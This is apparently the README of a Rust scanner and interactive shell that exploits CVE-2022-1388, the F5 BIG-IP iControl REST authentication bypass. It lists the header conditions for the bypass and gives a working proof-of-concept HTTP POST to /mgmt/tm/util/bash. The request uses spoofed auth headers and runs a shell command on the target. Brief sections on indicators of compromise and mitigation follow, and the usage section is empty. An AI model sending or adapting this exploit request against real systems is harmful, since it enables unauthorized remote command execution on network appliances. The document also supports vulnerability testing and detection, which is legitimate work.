# CVE-2022-1388-rs
Scanner and Interactive shell for CVE-2022-1388 F5 BIG-IP iControl REST Auth Bypass RCE written in Rust

## Summary
To wrap things up here is an overview of the necessary conditions of a request for exploiting this vulnerability:

- Connection header must include X-F5-Auth-Token
- X-F5-Auth-Token header must be present
- Host header must be localhost / or the Connection header must include X-Forwarded-Host
- Auth header must be set with the admin username and any password

## PoC

POST /mgmt/tm/util/bash HTTP/1.1
Authorization: Basic YWRtaW46aG9yaXpvbjM=
X-F5-Auth-Token: thisisrandomstring
User-Agent: curl/7.82.0
Connection: X-F5-Auth-Token
Accept: */*
Content-Length: 39
    "utilCmdArgs":"-c id"

# Setup LAB

- You can find the lab <a href="">Here</a>

## Usage

## Requirements

- Rust
- Cargo

## IoCs

IOCs can be found in the `/var/log/audit` log file. Unrecognized commands executed by the `mgmt/tm/util/bash` endpoint should be cause for concern.

## Mitigation

Update to the latest version or mitigate by following the instructions within the F5 Security Advisory


## References